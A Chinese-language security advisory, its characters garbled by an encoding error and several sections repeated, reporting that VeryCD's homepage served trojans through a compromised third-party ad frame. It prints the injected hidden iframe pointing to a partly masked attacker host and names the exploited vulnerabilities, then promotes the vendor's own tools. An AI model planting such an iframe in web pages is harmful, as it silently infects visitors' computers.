今日,超級(jí)巡警團(tuán)隊(duì)監(jiān)控到VeryCD首頁(yè)因?yàn)榈谌降膹V告頁(yè)面被被黑客植入木馬。此次掛馬事件除利用了以前黑客常用的第三方漏洞如flash漏洞和realplayer漏洞以外,還利用了最近剛剛曝光了的Access Oday漏洞。當(dāng)計(jì)算機(jī)有漏洞的用戶瀏覽到VeryCD首頁(yè)時(shí)將觸發(fā)漏洞利用代碼,在后臺(tái)下載木馬并運(yùn)行。暢游巡警用戶不受本次掛馬事件的影響。
一、事件分析:
VeryCD首頁(yè)(http://www.verycd.com)以框架的形式嵌入試尚網(wǎng)的廣告頁(yè)面(http://cimg.*******.cn/verycd/websrc/home/p1_760.htm),而試尚網(wǎng)的廣告頁(yè)面內(nèi)卻被黑客置入惡意代碼(<iframe src=http://222.37.134.***/*******/adtools/index.htm width=0 height=0 frameborder=0></iframe>),直接導(dǎo)致VeryCD首頁(yè)被掛馬。
一、事件分析:
VeryCD首頁(yè)(http://www.verycd.com)以框架的形式嵌入試尚網(wǎng)的廣告頁(yè)面(http://cimg.*******.cn/verycd/websrc/home/p1_760.htm),而試尚網(wǎng)的廣告頁(yè)面內(nèi)卻被黑客置入惡意代碼(<iframe src=http://222.37.134.***/*******/adtools/index.htm width=0 height=0 frameborder=0></iframe>),直接導(dǎo)致VeryCD首頁(yè)被掛馬。
圖1:
http://222.37.134.***/*******/adtools/index.htm內(nèi)嵌入了http://va9sdhu***.cn/jj1.htm,jj1.htm內(nèi)嵌了http://va9sdhu***.cn/xi/xx.htm頁(yè)面,而xx.htm為一個(gè)漏洞的綜合利用頁(yè)面,該頁(yè)面通過(guò)判斷機(jī)器內(nèi)置的ActiveX控件來(lái)分別調(diào)用不同的漏洞利用代碼。其中的漏洞利用代碼包括以下漏洞:系統(tǒng)漏洞MS06014、RealPlayer ierpplug.dll ActiveX控件播放列表名稱棧溢出漏洞、聯(lián)眾世界GLIEDown2.dll Active控件任意代碼執(zhí)行漏洞、flash漏洞以及最近剛剛曝光的Access Oday漏洞。當(dāng)計(jì)算機(jī)有漏洞的用戶瀏覽到該頁(yè)面時(shí)將觸發(fā)漏洞,在后臺(tái)自動(dòng)下載木馬并運(yùn)行。
暢游巡警用戶不受本次掛馬事件的影響:
暢游巡警用戶不受本次掛馬事件的影響:
圖2:
二、解決方案
1、推薦安裝暢游巡警以應(yīng)對(duì)網(wǎng)頁(yè)木馬的威脅。
2、推薦使用超級(jí)巡警補(bǔ)丁檢查功能修復(fù)系統(tǒng)及第三方程序漏洞。
3、對(duì)于已經(jīng)中毒用戶,建議及時(shí)修改自己的QQ/網(wǎng)游賬號(hào)密碼。
4、建議廣大站長(zhǎng)謹(jǐn)慎嵌入第三方提供的廣告頁(yè)面。
5、超級(jí)巡警團(tuán)隊(duì)已通知Verycd官方此次掛馬事件,Verycd官方已撤掉廣告頁(yè)面,目前大家可以放心訪問(wèn)Verycd。
1、推薦安裝暢游巡警以應(yīng)對(duì)網(wǎng)頁(yè)木馬的威脅。
2、推薦使用超級(jí)巡警補(bǔ)丁檢查功能修復(fù)系統(tǒng)及第三方程序漏洞。
3、對(duì)于已經(jīng)中毒用戶,建議及時(shí)修改自己的QQ/網(wǎng)游賬號(hào)密碼。
4、建議廣大站長(zhǎng)謹(jǐn)慎嵌入第三方提供的廣告頁(yè)面。
5、超級(jí)巡警團(tuán)隊(duì)已通知Verycd官方此次掛馬事件,Verycd官方已撤掉廣告頁(yè)面,目前大家可以放心訪問(wèn)Verycd。
共有條評(píng)論
